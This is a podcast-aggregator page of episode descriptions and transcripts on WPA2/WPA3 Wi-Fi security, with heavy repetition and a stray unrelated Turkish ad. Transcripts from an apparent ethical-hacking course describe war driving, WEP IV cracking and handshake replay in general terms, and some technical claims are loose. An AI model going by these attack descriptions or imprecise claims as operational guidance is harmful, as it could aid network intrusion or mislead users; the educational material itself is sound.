Security protocol to secure wireless computer networks
POPULARITY
Using a password-protected WPA2/3 hotspot is a minor inconvenience for a very significant level of additional security.
In der neuesten Folge von „MythenKnacker“ nehmen Nico und Dave den Mythos unter die Lupe, dass WLAN per se unsicher ist. Gemeinsam beleuchten sie die Entwicklung der WLAN-Sicherheit, angefangen bei den frühen Tagen mit dem unsicheren WEP-Standard bis hin zu den heutigen WPA2- und WPA3-Standards. Dabei geht es auch um die gängigen Schwachstellen in öffentlichen WLAN-Netzwerken und den häufigen Irrglauben, dass ein VPN automatisch alle Sicherheitsprobleme löst. Hörer erfahren zudem, warum eine gute Konfiguration das A und O ist, um sich in der drahtlosen Welt zu schützen.
In der neuesten Folge von „MythenKnacker“ nehmen Nico und Dave den Mythos unter die Lupe, dass WLAN per se unsicher ist. Gemeinsam beleuchten sie die Entwicklung der WLAN-Sicherheit, angefangen bei den frühen Tagen mit dem unsicheren WEP-Standard bis hin zu den heutigen WPA2- und WPA3-Standards. Dabei geht es auch um die gängigen Schwachstellen in öffentlichen WLAN-Netzwerken und den häufigen Irrglauben, dass ein VPN automatisch alle Sicherheitsprobleme löst. Hörer erfahren zudem, warum eine gute Konfiguration das A und O ist, um sich in der drahtlosen Welt zu schützen.
In der neuesten Folge von „MythenKnacker“ nehmen Nico und Dave den Mythos unter die Lupe, dass WLAN per se unsicher ist. Gemeinsam beleuchten sie die Entwicklung der WLAN-Sicherheit, angefangen bei den frühen Tagen mit dem unsicheren WEP-Standard bis hin zu den heutigen WPA2- und WPA3-Standards. Dabei geht es auch um die gängigen Schwachstellen in öffentlichen WLAN-Netzwerken und den häufigen Irrglauben, dass ein VPN automatisch alle Sicherheitsprobleme löst. Hörer erfahren zudem, warum eine gute Konfiguration das A und O ist, um sich in der drahtlosen Welt zu schützen.
Bill updates us on his distro hopping adventures and reviews 7 distros. We discuss getting connected to the internet, connecting your hardware, WPA2 best practices, and getting support. We provide a software suggestion and a game suggestion. We ask what you want for our next topic. Episode Time Stamps 00:00 Going Linux #459 · Networking - Part 2 01:08 Bill's distro hopping adventures 01:34 Bazzite Linux 07:14 NixOS 07:41 Manjaro 07:53 Ubuntu MATE 08:28 Linux Mint 09:36 Open SUSE 11:45 Kenoite 14:26 Networking 14:44 Connecting to the Internet 25:33 Connecting your hardware 36:52 WPA2 best practices 41:05 Use a firewall 41:30 Update your operating system 42:41 Use Bitwarden or another password manager 43:45 Use speedtest.net 44:12 Use your distributions forums or a support channel 45:30 The Linux Foundation 45:59 The Linux Documentation Project 46:22 Linux Questions 46:46 The Electronic Frontier Foundation 52:58 Software suggestion: GPT4all.io 57:07 Game suggestion: OSUI 58:54 goinglinux.com, goinglinux@gmail.com, +1-904-468-7889, @goinglinux, feedback, listen, subscribe 60:10 End
Bill updates us on his distro hopping adventures and reviews 7 distros. We discuss getting connected to the internet, connecting your hardware, WPA2 best practices, and getting support. We provide a software suggestion and a game suggestion. We ask what you want for our next topic. Episode Time Stamps 00:00 Going Linux #459 · Networking - Part 2 01:08 Bill's distro hopping adventures 01:34 Bazzite Linux 07:14 NixOS 07:41 Manjaro 07:53 Ubuntu MATE 08:28 Linux Mint 09:36 Open SUSE 11:45 Kenoite 14:26 Networking 14:44 Connecting to the Internet 25:33 Connecting your hardware 36:52 WPA2 best practices 41:05 Use a firewall 41:30 Update your operating system 42:41 Use Bitwarden or another password manager 43:45 Use speedtest.net 44:12 Use your distributions forums or a support channel 45:30 The Linux Foundation 45:59 The Linux Documentation Project 46:22 Linux Questions 46:46 The Electronic Frontier Foundation 52:58 Software suggestion: GPT4all.io 57:07 Game suggestion: OSUI 58:54 goinglinux.com, goinglinux@gmail.com, +1-904-468-7889, @goinglinux, feedback, listen, subscribe 60:10 End
It's time to make the switch from WPA2 to WPA3. We cover how to do it and what migration challenges to be prepared for no matter what WLAN you are dealing with (open, passphrase, or 802.1x) . We also discuss what features make WPA3 an improvement over WPA2, particularly the replacement of PSK with SAE.... Read more »
It's time to make the switch from WPA2 to WPA3. We cover how to do it and what migration challenges to be prepared for no matter what WLAN you are dealing with (open, passphrase, or 802.1x) . We also discuss what features make WPA3 an improvement over WPA2, particularly the replacement of PSK with SAE.... Read more »
On today's Heavy Wireless we discuss transitioning from WPA2 to WPA3, including pros and cons, managing the project, supporting WPA2 and WPA3 simultaneously, and more. My guest is Jennifer Minella, founder and Principal Advisor at Viszen Security. She's also an author, instructor, and blogger.
On today's Heavy Wireless we discuss transitioning from WPA2 to WPA3, including pros and cons, managing the project, supporting WPA2 and WPA3 simultaneously, and more. My guest is Jennifer Minella, founder and Principal Advisor at Viszen Security. She's also an author, instructor, and blogger. The post Heavy Wireless 002: Making The Transition To WPA3 With Jennifer Minella appeared first on Packet Pushers.
On today's Heavy Wireless we discuss transitioning from WPA2 to WPA3, including pros and cons, managing the project, supporting WPA2 and WPA3 simultaneously, and more. My guest is Jennifer Minella, founder and Principal Advisor at Viszen Security. She's also an author, instructor, and blogger. The post Heavy Wireless 002: Making The Transition To WPA3 With Jennifer Minella appeared first on Packet Pushers.
On today's Heavy Wireless we discuss transitioning from WPA2 to WPA3, including pros and cons, managing the project, supporting WPA2 and WPA3 simultaneously, and more. My guest is Jennifer Minella, founder and Principal Advisor at Viszen Security. She's also an author, instructor, and blogger.
On today's Heavy Wireless we discuss transitioning from WPA2 to WPA3, including pros and cons, managing the project, supporting WPA2 and WPA3 simultaneously, and more. My guest is Jennifer Minella, founder and Principal Advisor at Viszen Security. She's also an author, instructor, and blogger.
Chris is on leave again this week, so Mark and Josh do their best to proceed without him. Mark recaps the K12 SIX Conference that was held in Austin, Texas. Josh talks about trying to change a SSID over to WPA3 and it did not go well. They also talk about a new method students are using to attempt to crack WPA2 passphrases on Chromebooks using the chrome://net-export page. The majority of this episode is an interview that Chris and Mark conducted with Mr. Doug Levin, founder of K12 SIX. Doug sat down with the guys to talk about what K12 SIX offers to districts and what the goal of the conference is. LISTEN HERE (and on all major podcast platforms). Hang out with us at K12TechPro.com Buy our merch!!! Vizor - 20% Off Fortinet - Email fortinetpodcast@fortinet.com SomethingCool.com - Cybersecurity Solutions Extreme Networks - Email dmayer@extremenetworks.com Provision Data Solutions Oh, and... Email us at k12techtalk@gmail.com Tweet us @k12techtalkpod Visit our LinkedIn page HERE Reddit
Bitcoin is crashing, leaving a lot of people out of pocket. Windows 11 is sneaking ads into the operating system, and what is WPA3? With some public Wi-Fi tips and recommendations, this is your Really Useful Podcast.You can subscribe to the Really Useful Podcast on Apple Podcasts, Spotify, Google Podcasts, Amazon Music and Audible, Player FM, or copy the RSS feed into your podcast player.This week, we chat about the following tech news that matters: US Justice Department Seizes Billions in Bitcoin Windows 11 Nudges Sign-up Ads Apple Considering Portless iPhone We've got these tips and tricks: WEP, WPA, WPA2, and WPA3 Explained Ways Hackers Can Use Public Wi-Fi to Steal Your Identity We finish the show with the following recommendations: TheC64 Collection 1 cartridge for Evercade Nothing Ear Stick review Christian Cawley and Gavin Phillips host this podcast. You can contact them on Twitter: @thegadgetmonkey and @gavinspavin, with your suggestions for future topics.
Configuration Examples with KevTechify for the Cisco Certified Network Associate (CCNA)
In this episode we are going to look at configuring Configure a WPA2 Enterprise WLAN on the WLC.We have already configured and tested the WLC with an existing WLAN. We configured WPA2-PSK for that WLAN because it was to be used in a smaller business. We have been asked to configure and test a WLC topology that will be used in a larger enterprise. We know that WPA2-PSK does not scale well and is not appropriate to use in an enterprise network. This new topology will use a RADIUS server and WPA2-Enterprise to authenticate WLAN users. This allows administration of the user accounts from a central location and provides enhanced security and transparency because each account has its own username and password. In addition, user activity is logged on the server. In this lab, we will create a new VLAN interface, use that interface to create a new WLAN, and secure that WLAN with WPA2-Enterprise. We will also configure the WLC to use the enterprise RADIUS server to authenticate users. In addition, we will configure the WLC to use a SNMP server. We will be configuring a new WLAN on a wireless LAN controller (WLC), including the VLAN interface that it will use. We will configure the WLAN to use a RADIUS server and WPA2-Enterprise to authenticate users. We will also configure the WLC to use an SNMP server, Configure a new VLAN interface on a WLC, Configure a new WLAN on a WLC, Configure a new scope on the WLC internal DHCP server, Configure the WLC with SNMP settings, Configure the WLC to user a RADIUS server to authenticate WLAN users, Secure a WLAN with WPA2-Enterprise, and Connect hosts to the new WLC.Thank you so much for watching this episode of my series on Configuration Examples for the Cisco Certified Network Associate (CCNA).Once again, I'm Kevin and this is KevTechify. Let's get this adventure started.All my details and contact information can be found on my website, https://KevTechify.comYouTube Channel: https://YouTube.com/KevTechify-------------------------------------------------------Cisco Certified Network Associate (CCNA)Configuration Examples for Switching, Routing, and Wireless Essentials v2 (SRWE)WLAN ConfigurationLab 13.3.12 - Configure a WPA2 Enterprise WLAN on the WLCPodcast Number: 56Season: 1-------------------------------------------------------Equipment I like.Home Lab ►► https://kit.co/KevTechify/home-labNetworking Tools ►► https://kit.co/KevTechify/networking-toolsStudio Equipment ►► https://kit.co/KevTechify/studio-equipment
In euren Router-Einstellungen (Fritzbox) findet ihr die Verschlüsselungsmethode WPA2 CCMP. Wir erklären hier, was das ist, ob es besser als WPA+WPA2 und WEP ist und ob ihr den Modus benutzen solltet.
In this episode we are going to look at Configure a WPA2 Enterprise WLAN on the WLC.We will be discussing SNMP and RADIUS, Configure SNMP Server Information, Configure RADIUS Server Information, Topology with VLAN 5 Addressing, Configure a New Interface, Configure a DHCP Scope, and Configure a WPA2 Enterprise WLAN.Thank you so much for listening to this episode of my series on Switching, Routing, and Wireless Essentials for the Cisco Certified Network Associate (CCNA).Once again, I'm Kevin and this is KevTechify. Let's get this adventure started.All my details and contact information can be found on my website, https://KevTechify.com-------------------------------------------------------Cisco Certified Network Associate (CCNA)Switching, Routing, and Wireless Essentials v2 (SRWE)Episode 13 - WLAN ConfigurationPart C - Configure a WPA2 Enterprise WLAN on the WLCPodcast Number: 51-------------------------------------------------------Equipment I like.Home Lab ►► https://kit.co/KevTechify/home-labNetworking Tools ►► https://kit.co/KevTechify/networking-toolsStudio Equipment ►► https://kit.co/KevTechify/studio-equipment
Simple Cyber Defense Security Updates Season 3 Episode 5 Support US: Donations - https://simplecyberdefense.com/Donate Connect with US: Facebook - https://www.facebook.com/SimpleCyberDefense/ Twitter - https://twitter.com/SimCyberDefense MeWe - https://mewe.com/join/simplecyberdefense Mastodon - https://mastodon.social/@SimpleCyberDefense Minds - https://mastodon.social/@SimpleCyberDefense LBRY - https://lbry.tv/@SimpleCyberDefense LinkedIn - https://www.linkedin.com/groups/12488483/ Rumble - https://rumble.com/c/c-406535 PeerTube - https://worldofvids.com/video-channels/simple_cyber_defenese/videos YouTube - https://www.youtube.com/channel/UCF1IvGkxa4qz-jsJg70884Q Intro: Film Glitch by Snowflake (c) copyright 2017 Licensed under a Creative Commons Attribution Noncommercial (3.0) license. http://dig.ccmixter.org/files/snowflake/56350 Ft: reusenoise Links: 8 Steps to Stronger Wifi Security - https://www.digicert.com/blog/8-steps-stronger-wifi-security Differences among WEP, WPA, WPA2 and WPA3 wireless security protocols - https://www.techtarget.com/searchnetworking/feature/Wireless-encryption-basics-Understanding-WEP-WPA-and-WPA2 --- This episode is sponsored by · Anchor: The easiest way to make a podcast. https://anchor.fm/app --- Send in a voice message: https://anchor.fm/simplecyberdefense/message Support this podcast: https://anchor.fm/simplecyberdefense/support
Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: https://davidbombal.wiki/meraki Apologies for the glitches in this video
Telefonunuzu temizleyin, dosyaları hızla bulup çevrimdışı olarak paylaşın Google Files dosya yönetimi uygulamasıyla kolayca yapabilecekleriniz: ✨ Silme önerileriyle yer açabilirsiniz
Hello everyone welcome to the show "Ethical Hacking" episode 86 today we are going to discuss about So we've talked about securing our wireless networks.Let's now spend a few minutes talking about the different types of attacks that focus on our wireless networks.The first is war driving.War driving is the act of searching for wireless networks by driving around until you find them.You could try this tonight. You can go sit in the backseat of your car,have your friend or your wife,drive you around the neighborhood and see which networks you can connect to.That's the idea here.They're simply going to drive around and hunt for networks.Now the attackers here are going to use different tools to do this.They can use wireless survey tools or other open source attack tools, but the common theme here is just finding out what networks are around and where you can access them from.Why would an attacker want to find open wireless networks or networks that they can get on to?It's not necessarily to attack your network,but it's to attack other networks through your network.So that way if they are doing some hacking or something like that,it traces back to your home and your home network,as opposed to tracing it back to them.The next type of attack is called war chalking.War chalking is the act of physically drawing symbols in public places to denote the open, closed, or protected networks that are in range.It gets its name because in the early days,people would actually take chalk and draw on a telephone pole different symbols to tell other people what it is.Now an example of this might be as you're doing a war driving,you might find an open network.If you did, you could find a telephone pole nearby,you can mark it down with a symbol like this.We have two open half circles faced back to back with the SSID of it written above them and the number below to signify the bandwidth of the network.Afterall, attackers can be nice people too.And they like to share their findings with others and they wouldn't want somebody else wasting their time looking for a network,only to find it has low bandwidth.So by marking that down,you can help other people avoid that network.Now in addition to open networks, you may find closed networks If you find a closed network,it's going to be a closed circle with an SSID written above it and bandwidth written below it.This tells us that network has some kind of encryption,it's closed,but we haven't quite figured out the password yet.Now if we do figure out the password,we can actually use this other symbol.We have the closed circle,we have the SSID on the top left left,we have the password on the top right,and the bandwidth below it.Inside the circle we might write something like W or WEP or WPA2,so people know what type of encryption they need to connect to that network.Now as I said war chalking is not nearly as popular as it used to be.In fact we don't really see a lot of these symbols around in the city anymore.Instead, most of this is being done digitally. This is being done as part of websites or other apps that hackers use and share their finds,so people know what other kind of WiFi is out there.The next attack we have is known as an IV attack.An IV attack occurs when an attack observes the operation of a cipher being used with several different keys and they findthis mathematical relationship between those keys to determine the clear text data.Now I know that sounds really complicated,but the good news is you don't have to do the math to do it.There's programs that do it for you.This happened with WEP because of that 24 bit initialization vector.It makes it very easy to crack WEP because there's programs that do it for us.
Hello everyone welcome to the show "Ethical Hacking" episode 84 today we are going to discuss about Wireless encryption. Another huge vulnerability in wireless networks is the encryption that you choose to use.In this lesson, we're going to do a quick review of wireless encryption types,that you learned back in your Network Plus studies.The reason for this is because encryption of your data being transmitted is going to be paramount to increasing the security of your wireless networks.Now, most wireless encryption schemes rely on a pre-shared key.This is when the access point and the client use the same encryption key to encrypt and decrypt the data.The problem with this is scalability becomes difficult.Think about it, when a friend comes over to your house,to use your WiFi.You have to tell him your password.Now, if you have 50 friends come over,you're going to tell 50 different people your password,and now, all 50 of them know your password.And so, this is one of the first problems that we have with wireless encryption,is that if you're going to use a pre-shared key,you've got to figure out a secure way to distribute that key to everybody,and keep it secret.If all 50 people know your password,then it's probably not that secret anymore.Now, there are three main types of encryption that are in use from wireless networks.We have WEP, WPA, and WPA2.WEP is our first one.WEP is the Wired Equivalent Privacy.This came from the original 802.11 wireless security standard,and it claimed to be as secure as a wired network.I'm going to prove this wrong to you in our demonstration later,because we're going to brute-force WEP,and break it in about three minutes.WEP was originally used with a static 40-bit pre-shared encryption key,but later it was upgraded to a 64-bit key,and, then again, to a 128-bit key.This isn't the main problem with WEP, though.The main problem is a 24-bit Initialization Vector,or IV, that it uses in establishing the connection,and it's sent in clear text.As I said, WEP is not very secure,and because of this weak Initialization Vector,we're going to be able to brute-force WEP in just a couple of minutes,using using Aircrack-Ng and other tools.So, to replace WEP, they came up with WPA.WPA is the WiFi Protected Access standard.It uses a Temporal Key Integrity Protocol, or TKIP,which uses a 48-bit Initialization Vector,instead of the 24-bit Initialization Vector used by WEP.The encryption that it uses is the Rivest Cipher 4,or RC4, and it added Message Integrity Checking, or MIC.And, it uses all of this to make sure that the data is secure,and ensuring that it's not modified in transit.Overall, it's a pretty good standard,but it does have some flaws,and so version 2 was released to fix those.WPA version 2, or WiFi Protected Access version 2 was created as part of the 802.11i standard,to provide stronger encryption and better integrity checking.The integrity checking is conducted through CCMP,which is the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol.And, the encryption uses AES,the Advanced Encryption Standard.AES supports a 128-bit key, or higher,and WPA2 uses either a personal mode,with pretty short keys,or an enterprise mode,with centralized authentication via a radio server,or another centralized server,to handle that password distribution we were talking about.Now, I want to pause here for a second,and before we go any further,give you a couple of quick exam tips.First, if you're asked about WiFi,and it uses the word, Open, in the question, it's usually looking for some kind of answer that says the network has no security, or no protection.
Hello everyone my name is vijay kumar Devireddy and I am glad to have you back on my episode 76 today we're going to discuss about Replay attacks.A replay attack is a network-based attack where valid data transmissions are fraudulently or maliciously re-broadcast,repeated or delayed.This works a lot like a session hijack but it's a little bit different.With a session hijack,the attacker is trying to modify the information being sent and received at real time but with a replay attack,we're simply trying to intercept it,analyze it and decid whether or not to let it be passed on later again.Now, for example, if I were able to capture the session that occurs when you went in to log into your bank with your username and password,I could then replay that session to the bank later on in an attempt to log in as you.That's the idea of a replay attack.Now, to combat a replay attack,you should ensure that websites and devices are using session tokens to uniquely identify when an authentication session is occurring.Also, if you use multi-factor authentication,this can help prevent the ability of a log on session to be replayed because it doesn't have that token that has that random data that's changed every 30 to 60 seconds if you're using something like a one-time use password as part of your multi-factor authentication.One place where replay attacks have been used quite successfully though is in the world of wireless authentication.By capturing a device's handshake onto the wireless network,you can replay it later to gain access to that network yourself as if you were them.This is extremely common in the older protocols,especially the wired equivalent privacy or WEP when using a wireless network. So, you should be using the latest protocols like WPA2 to help prevent and minimize your risk.
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
AI can't patent their inventions a US judge rules US Cyber Command warns of ongoing attacks on a Confluence vulnerability Looking into a translated ransomware playbook Windows 10 or 11 on a Raspberry Pi is easy to install with a new script Changes in Docker's subscription plans, usage rules and product line Why supply chain attacks will keep getting worse Host RoundTable: The state of the wireless world Hosts: Louis Maresca, Brian Chee, Curt Franklin, and Heather "Mo" Williams Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: Bitwarden.com/twit itpro.tv/enterprise use code ENTERPRISE30 wwt.com/twit
As the world re-opens and you begin to stretch your legs, ALPS Risk Manager Mark B tells some true tales and offers some tips for safeguarding your client data and maintaining your firm's cybersecurity from your phone, Airbnb, or the wide-open road. Transcript: Mark Bassingthwaighte: Hello, I'm Mark Bassingthwaighte, the risk manager with ALPS, and welcome to another episode of ALPS in Brief, the podcast that comes to you from the historic Florence building in beautiful downtown Missoula, Montana. It is a pleasure to have the opportunity to visit again via podcast. Before I get into the topic of this podcast, I'd like to share story and some information about what's going on and in my life as a way to set up where we're going to go. Let's start with a call that I took earlier this week, and it came from an attorney who really wanted to understand if what he was doing in terms of security with his system was sufficient, if there was other things that he could do. What prompted the call is he went through an experience somewhat similar to what happened to my wife and I a number of years ago, he was the victim of identity theft. Had a tax return filed, fraudulently filed, obviously, in his name, and some other things had occurred. One of the mistakes he made, however, was using a complex password. Now, that was not the mistake, that's a great thing, but he used it on multiple accounts. And as a result of getting his personal information, they were also able to get into his work computer. Some email was being sent out from his computer under his name, trying to scam clients and some businesses he works with out of funds. And so, that was a bit of a mess. The other situation that's going on in terms of my own life is, and this is all good, but my wife and I are currently in transition. We are going through something I think a lot of people are going through in these crazy times, and it has to do with moving. Long story short again, the timing of moving out of one home, which has been sold, and into a new home, which is currently still under construction, did not line up as close as we might have liked, so we are currently in transition, living in a temporary apartment until things settle down and get finished. You know, it's quite a change. Most of our belongings are sitting in storage. We kid around that at some point when we finally get settled, and the truck unloaded and start unpacking, it'll be like Christmas. We'll say, "Hey, I had no idea we had this stuff." So it's got to be fun. But I began to realize, although I've been telecommuting for many, many years, and will continue to do so, this transition into a corporate apartment, and by that, I simply just mean it's a small furnished apartment, sort of struck me as I'm going through an experience similar to what I think a lot of people did when they had to rapidly transition from the office to working from home in the early days of the pandemic. There were some things here, that as I started to set up and figure out what was going on, I realized, "Oof, wait, there are some security issues that really need to be addressed." I thought it's worth talking about some of this. The lawyer that called, it was about best practices. You know, "What am I doing wrong? What am I doing right? Is there anything else I could be doing?" And we had a good discussion, and it turns out there were a few things she could do to further secure what he was doing. And again, I sit and think, "Okay, boy, I didn't realize, just wasn't thinking about how much I take for granted given my old situation and then transitioning." So let's talk about what we can do as individuals to make our systems as secure as we can to help protect the competences, the property, the identities of our clients, and of course our own personal information. This discussion is not about everything that we can do to secure an office network. It's more focusing on the day-to-day basics, the day-to-day things we should all be thinking about that can help. IT, at our firm, keep us secure as a firm, and keep our information and the information of our clients private and confidential. That's look at this, and I want to start with just the basics, and then we'll kind of explore some other things. But the basics, it is extremely important that we keep the operating system and the applications that we're running on all these devices current in terms of security patches. Now, when I talk about devices, I'm talking about the laptops or PCs that we have at home, but even the mobile devices we travel with for vacation or for work trips. You know, smart phones, tablets, all of these things we need to keep current. Sometimes we may even need to go out and look for patches. I have to do that occasionally on applications on our cell phones. But these patches are being issued for a reason, and they are often bringing additional security features or updates to close vulnerabilities that have been discovered in prior versions, so absolutely essential. Now, one of the things that a lot of people do, and we all spend all kinds of money nowadays on these smartphones, and there's some crazy awesome phones out there, but we treat them as phones. We're not always thinking about the fact that this is a pretty robust computer. So we need to make sure that every mobile device and every device in our home that we are using for work has a internet security suite running, and it too should be kept current with all patches. One side note here, do not rely on free security programs or free VPNs. There's lots of free stuff out there, even in the security space, and you get what you pay for, which is very little when it comes to security. Now I'm not suggesting that the security software, these free VPNs, don't do what they say they're going to do. A free VPN will certainly encrypt your data stream so that anybody that tries to intercept this data stream won't see it. But the company that gives you this free product, there's an exchange, and the exchange is they get to monetize and monitor all your doing, and so you are what they are making money off of. That's not acceptable. And for a lawyer who is practicing law in terms of using these devices in the further and the practice of the law, because that information, just no. So you need to spend the few bucks that it's going to cost and be a bit more secure about it all. Turn on full disk encryption. You know, in this day and age, when it's one setting on a phone or a laptop, turn this stuff on. I consider it unethical, I truly consider it incompetent, not to take the time to turn this stuff on. Full disk encryption is typically once you turn your device off and somebody tries to turn it back on, if it's lost or stolen, if they don't have the password to decrypt, your data is protected and your client confidences are protected. So turn that on. Set up the ability to do remote wipes if a device is ever lost or stolen. I mean, doesn't that seem like a no-brainer? Take the time to do that. Again, it's so simple and easy to do. Use strong passwords, long pins, and never use the same password or pin on different devices or accounts. The story I just shared with the lawyer who called me, that was the mistake. He was using a very complex password, which was great, but he was using that same password on multiple accounts. You know, if they get one, they have now access to everything. That that makes no sense. Now, what is a complex password? Well, best practices would say 16 characters. We're rapidly approaching 20, a number of people that I work with and know in the security space really are saying 20. I routinely am using 20 to 24 on a number of accounts if the device or the application will accept that. And when we say complex, so in my case, we have 20 characters on some of this stuff. It's upper, lower case letters. It's symbols. It's numbers. And it's going to be very, very hard to guess. You know, there's no dictionary words here that that would be easy for a hacker to try to figure out. A lot of pushback that I get on this is, "How can I remember all of this stuff? Good Lord." You know? "I have trouble remembering what I had for breakfast yesterday, Mark." Well, I am not kidding you when I say that my wife and I probably manage between 200, 250 complex passwords and different usernames. I never repeat. I never use them on multiple counts, this kind of thing. What have I done differently? I use a password manager. Personally, I use RoboForm. There are a number out there that are quite good. Dashlane would be another example. But these programs store and manage all these complex passwords for us. And if I need to change a password, it will even do that for me and randomly generate a new complex password, and memorize it for me. So all of my wife and I need to do is remember a very complex, and this is a long one, but a very complex passphrase, and that's the keys to the kingdom. It's not written down anywhere. We remember it. There's no stickies, it's all easy. But we have the ability now to use complex passwords in every aspect of our life, on any account and device that it'll work with. Turn on or utilize two factor authentication on all accounts. Don't make it easy. Two factor authentication, we're talking about authenticator apps or sending a pin as you try to log in your bank account. You get the code, a six digit code, typically, on a text message. You don't want to make it easy. If somebody happens to figure out what the password is on, heaven forbid your IOLTA account, and they're trying to steal some money out of them, well, when they're logging in, if they don't have your phone, the text message isn't coming to them. It's just one extra level of protection. And I'm telling you. Now, TFA, you can hack it. Using that doesn't mean you're 100% secure, but you are exponentially more secure than not using TFA, so absolutely use that on every work personal account that you can in terms of if it's available: email accounts, financial accounts, in terms of investment, bank accounts, those kinds of things, are obvious key places where you would want to do that. Install a VPN. A VPN, and that stands for virtual private network, and it is a software program that will encrypt your data stream so that if you are, well, I'm going to talk about this a bit more in terms of wifi momentarily, but it just makes sure that the sessions, when we are on the internet, that the data stream is encrypted. Again, we're trying to make it ever more complex. Those are some basic things to think about. But now I want to shift gears a little bit and explore. You know, as lawyers, we do take vacations and we travel for business, and there's some exposures that come up here as well. It could be staying in an Airbnb, in a hotel. The list goes on. So a couple of quick behavioral comments, things that we can do. Never use a public computer. I'm thinking about the business center at the resort in Cabo, or at the hotel in DC, whatever it might be, or even local libraries. There's all sorts of places where public computers are available. Absolutely not acceptable in terms of practicing law, communicating with clients. These things are very, very difficult to keep secure. Anybody can come in and do all kinds of stuff, so I would just not use them at all. Literally, if I had my own firm and was in charge of things here, I would have one warning, and do it twice you're fired if somebody, anybody, were using a public computer for work. It's that high risk. No public wifi. No open. You know, I'm talking about the airport, I'm talking about the signal at the hotel, I'm talking about Starbucks, those kinds of things. We absolutely cannot use this if any alternative exists. And there are alternatives. I won't get into what all the risks are, but it's very, very insecure and very high risk. So what's an alternative? Well, when I travel, a lot of times what I will do is connect my laptop to my smartphone. I'm using my smartphone then as a hotspot, and so the data stream will be sent using the carrier signal, AT&T, Verizon, whatever carrier you have. Far more secure than the local wifi hotspot. If however, and I can appreciate at times there are some circumstances where it may not be an option and you really must use wifi, there are some interesting ethics opinions out there that talk about this, but it is an acceptable risk with certain conditions. The two big wins are this, make sure that you know what the legitimate signal is. If you're at an airport and you're turning it on, you're trying, and it says, "Oh, here's Free Jet Blue wifi." "Oh, I love Jet Blue." Jet Blue has never made wifi available. Okay? But that signal has been out there. People will just create names that they think people will log into. If you're at a Hilton Hotel and you see Free Hilton, it's not Hilton. That's not what they call their network. Make sure you know. Ask the barista, ask the person at the front desk at the hotel. "What is the name of the network that you have set up that's the legitimate one for me to use?" So now which one to connect to. Then the other thing is, and this is not optional, as soon as you log into the network, initiate, use the VPN. Encrypt your signal. Is this 